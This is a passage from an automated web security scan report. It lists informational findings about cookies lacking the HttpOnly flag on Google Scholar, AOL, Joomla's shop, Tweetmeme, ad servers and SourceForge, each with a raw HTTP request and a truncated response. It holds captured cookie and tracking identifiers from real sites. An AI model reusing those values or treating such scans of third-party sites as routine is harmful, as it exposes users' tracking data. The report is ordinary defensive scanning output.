  • PREF=ID=b5f8ca2c9be5aa39:TM=1295884935:LM=1295884935:S=AsqWh3wvXaOvonOV; expires=Wed, 23-Jan-2013 16:02:15 GMT; path=/; domain=.google.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /schhp HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=b5f8ca2c9be5aa39; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=b5f8ca2c9be5aa39:TM=1295884935:LM=1295884935:S=AsqWh3wvXaOvonOV; expires=Wed, 23-Jan-2013 16:02:15 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 16:02:15 GMT
Server: scholar
Expires: Mon, 24 Jan 2011 16:02:15 GMT
Cache-Control: private
Connection: close

<html><head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><meta HTTP-EQUIV="imagetoolbar" content="no"><title>Google Scholar</title><style>body,td,a,p,.h{font-family:arial,sans-ser
...[SNIP]...

14.559. http://scholar.google.com/scholar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scholar.google.com
Path:   /scholar

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • GSP=ID=ba854cced93b2364; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
  • PREF=ID=ba854cced93b2364:TM=1295884936:LM=1295884936:S=HAc13nrthyumpJSW; expires=Wed, 23-Jan-2013 16:02:16 GMT; path=/; domain=.google.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scholar?hl\x3den\x26tab\x3dws\x22 HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://scholar.google.com/schhp?hl=en&as_sdt=0,9
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=ba854cced93b2364; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=ba854cced93b2364:TM=1295884936:LM=1295884936:S=HAc13nrthyumpJSW; expires=Wed, 23-Jan-2013 16:02:16 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 16:02:16 GMT
Server: scholar
Content-Length: 249
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://scholar.google.com/schhp?
...[SNIP]...

14.560. http://search.aol.com/%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.aol.com
Path:   /%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • clickstreamid=-768582947549177520
  • TBS=prod:1295884937044:0; Domain=search.aol.com; Path=/
  • s_guid=297ca3792dae42bc82b64a0311d91529:240111; Domain=search.aol.com; Expires=Tue, 21-Feb-2012 16:02:17 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C HTTP/1.1
Host: search.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 406 Not Acceptable
Date: Mon, 24 Jan 2011 16:02:17 GMT
Set-Cookie: clickstreamid=-768582947549177520
Set-Cookie: TBS=prod:1295884937044:0; Domain=search.aol.com; Path=/
Set-Cookie: s_guid=297ca3792dae42bc82b64a0311d91529:240111; Domain=search.aol.com; Expires=Tue, 21-Feb-2012 16:02:17 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Length: 1070
Keep-Alive: timeout=5, max=963
Connection: Keep-Alive

<html><head><title>Apache Tomcat/5.5.27 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

14.561. http://segment-pixel.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • segments="3391|3392|30767|11262|16681|11265|17329|18086|17277|38582,1298044270|10102"; Domain=invitemedia.com; expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?partnerID=79&code=285379&code=302775&key=segment&returnType=js HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD00OSwxMjMiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPHNjcmlwdCBzcmM9Imh0dHA6Ly9zZWdtZW50LXBpeGVsLmludml0ZW1lZGlhLmNvbS9waXhlbD9wYXJ0bmVySUQ9NzkmY29kZT0yODUzNzkmY29kZT0zMDI3NzUma2V5PXNlZ21lbnQmcmV0dXJuVHlwZT1qcyI%2BPC9zY3JpcHQ%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTc2LDMyJm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=801802b5e74884030c94b77c781c1c27
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid="eyI0IjpbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsNzM0MTUxXX0="; io_frequency="{\"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]}"; subID="{}"; dp_rec="{\"2\": 1295634039}"; segments="30767|11262|16681|11265|17329|18086|17277|38582,1298044270|10102"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 24 Jan 2011 21:07:11 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 24-Jan-2011 21:06:51 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments="3391|3392|30767|11262|16681|11265|17329|18086|17277|38582,1298044270|10102"; Domain=invitemedia.com; expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
Content-Length: 488

makePixelRequest("http://ad.doubleclick.net/activity;src=1946758;dcnet=4591;boom=30274;sz=1x1;ord=1","image");makePixelRequest("http://ad.doubleclick.net/activity;src=1946758;dcnet=4591;boom=30275;sz=
...[SNIP]...

14.562. http://segment-pixel.invitemedia.com/unpixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /unpixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • segments="3391|3392|30767|11262|11265|17329|18086|17277|38582,1298044270|10102"; Domain=invitemedia.com; expires=Tue, 24-Jan-2012 22:20:55 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /unpixel?pixelID=16681&partnerID=159&clientID=2781&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid="eyI0IjpbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsNzM0MTUxXX0="; io_frequency="{\"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]}"; subID="{}"; dp_rec="{\"2\": 1295634039}"; segments="3391|3392|30767|11262|16681|11265|17329|18086|17277|38582,1298044270|10102"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 24 Jan 2011 22:20:55 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 24-Jan-2011 22:20:35 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments="3391|3392|30767|11262|11265|17329|18086|17277|38582,1298044270|10102"; Domain=invitemedia.com; expires=Tue, 24-Jan-2012 22:20:55 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

14.563. https://sell.autotrader.com/syc/syc_center.jsf/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sell.autotrader.com
Path:   /syc/syc_center.jsf/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServersell=1753538570.47140.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /syc/syc_center.jsf/x22 HTTP/1.1
Host: sell.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:24 GMT
Server: Apache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServersell=1753538570.47140.0000; path=/
Keep-Alive: timeout=30
Content-Length: 216

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /syc/syc_center.jsf/x22 was not found on this server.<P>
...[SNIP]...

14.564. http://shop.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.joomla.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 7d9543e8bcda4746e859f8a307a0cf8b=f11faeaa8bfcf1173cca705e8a18bcf3; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: shop.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 7d9543e8bcda4746e859f8a307a0cf8b=f11faeaa8bfcf1173cca705e8a18bcf3; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:26 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25985


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...

14.565. http://shop.joomla.org/amazonca-bookstores.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.joomla.org
Path:   /amazonca-bookstores.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 7d9543e8bcda4746e859f8a307a0cf8b=6f4ba96b12412512286550c1c4e022c3; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /amazonca-bookstores.html HTTP/1.1
Host: shop.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 7d9543e8bcda4746e859f8a307a0cf8b=6f4ba96b12412512286550c1c4e022c3; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:28 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...

14.566. http://shop.joomla.org/amazoncom-bookstores.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.joomla.org
Path:   /amazoncom-bookstores.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 7d9543e8bcda4746e859f8a307a0cf8b=5d15bc9ea87fed1dc0557d8ce38f387c; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /amazoncom-bookstores.html HTTP/1.1
Host: shop.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 7d9543e8bcda4746e859f8a307a0cf8b=5d15bc9ea87fed1dc0557d8ce38f387c; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:26 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18243


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...

14.567. http://shop.joomla.org/amazoncouk-bookstores.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.joomla.org
Path:   /amazoncouk-bookstores.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 7d9543e8bcda4746e859f8a307a0cf8b=f75616fa7408188c2fab0b8e14e1d941; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /amazoncouk-bookstores.html HTTP/1.1
Host: shop.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 7d9543e8bcda4746e859f8a307a0cf8b=f75616fa7408188c2fab0b8e14e1d941; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:29 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18261


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...

14.568. http://shop.joomla.org/amazonde-bookstores.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.joomla.org
Path:   /amazonde-bookstores.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 7d9543e8bcda4746e859f8a307a0cf8b=298c7bb388ae5200b47c09c683c7ea11; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /amazonde-bookstores.html HTTP/1.1
Host: shop.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 7d9543e8bcda4746e859f8a307a0cf8b=298c7bb388ae5200b47c09c683c7ea11; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:29 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18270


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...

14.569. http://shop.joomla.org/amazonfr-bookstores.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.joomla.org
Path:   /amazonfr-bookstores.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 7d9543e8bcda4746e859f8a307a0cf8b=9bb100633a131de24e6007e097496143; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /amazonfr-bookstores.html HTTP/1.1
Host: shop.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 7d9543e8bcda4746e859f8a307a0cf8b=9bb100633a131de24e6007e097496143; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:28 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...

14.570. http://shop.joomla.org/faqs.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.joomla.org
Path:   /faqs.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 7d9543e8bcda4746e859f8a307a0cf8b=2bef4d635d7d090f5082a1fa1dbebd93; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /faqs.html HTTP/1.1
Host: shop.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 7d9543e8bcda4746e859f8a307a0cf8b=2bef4d635d7d090f5082a1fa1dbebd93; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:28 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23723


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...

14.571. http://shopping.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=f1ebd483b2efcc03279de61bb3488d25; expires=Tue, 01-Feb-2011 13:16:01 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: shopping.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:16:01 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=f1ebd483b2efcc03279de61bb3488d25; expires=Tue, 01-Feb-2011 13:16:01 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0041639804840088
X-Served-In: 0.046626806259155
X-Served-By: h00
Content-Length: 42519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

14.572. http://simonwillison.net/2004/May/26/addLoadEvent/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://simonwillison.net
Path:   /2004/May/26/addLoadEvent/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • openid="Set-Cookie: openid=; expires=Tue, 25-Jan-2011 13:16:05 GMT; Max-Age=0; Path=/;";
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2004/May/26/addLoadEvent/ HTTP/1.1
Host: simonwillison.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.5.4
Date: Tue, 25 Jan 2011 13:16:05 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Tue, 25 Jan 2011 13:16:12 GMT
Vary: Cookie
Last-Modified: Tue, 25 Jan 2011 13:14:12 GMT
ETag: 62572f46c0e2e4374a72e5ad7c169014
Cache-Control: max-age=120
Set-Cookie: openid="Set-Cookie: openid=; expires=Tue, 25-Jan-2011 13:16:05 GMT; Max-Age=0; Path=/;";
Content-Length: 63053

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Executing JavaSc
...[SNIP]...

14.573. http://smallbusinessnews.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smallbusinessnews.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=bd74cadd632dd88dd5215d3c753b762c; expires=Tue, 01-Feb-2011 13:16:10 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: smallbusinessnews.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:16:10 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=bd74cadd632dd88dd5215d3c753b762c; expires=Tue, 01-Feb-2011 13:16:10 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0054209232330322
X-Served-In: 0.042685031890869
X-Served-By: ded2060
Content-Length: 44487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

14.574. http://smp.specificmedia.com/smp/v=5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smp.specificmedia.com
Path:   /smp/v=5

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • smu=5046.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 29-Dec-2015 21:06:42 GMT
  • smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; domain=.specificmedia.com; path=/; expires=Tue, 29-Dec-2015 21:06:42 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smp/v=5;m=1;t=2568;ts=1295903195040 HTTP/1.1
Host: smp.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smu=5051.928757113086138685

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 21:06:42 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5046.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 29-Dec-2015 21:06:42 GMT
Set-cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; domain=.specificmedia.com; path=/; expires=Tue, 29-Dec-2015 21:06:42 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Location: http://cache.specificmedia.com/creative/blank.gif
Connection: close
Content-Type: text/html
Content-Length: 412

<head><title>Moved</title>
<body>This object has moved to <a href="http://cache.specificmedia.com/creative/blank.gif">http://cache.specificmedia.com/creative/blank.gif</a></body>
<!DOCTYPE HTML PUBLIC
...[SNIP]...

14.575. http://sourceforge.net/projects/nzbget/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/nzbget/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • sf.consume=8700121d2e69d73420eb7360565fa0b13958dd8dgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUFcHJlZnNxBX1xBlUOdXNlc19yZWxhdGlvbnNxB4lVB3ZlcnNpb25xCFUBMlUDa2V5cQlVGDRkM2RhMjk4ZGFiMGNhMGViMTAwMGM2MXEKVQNfaWRxC1UgNzljMTAxOWFiMWI4MWUzOGJmOGZmM2ZjMGJkNzllMWZxDFUOX2FjY2Vzc2VkX3RpbWVxDUdB009ophg07FUOX2NyZWF0aW9uX3RpbWVxDkdB009ophg0EXUu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/nzbget/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 16:02:32 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: VISITOR=4d3da298dab0ca0eb1000c61; expires="Thu, 21-Jan-2021 16:02:32 GMT"; httponly; Max-Age=315360000; Path=/
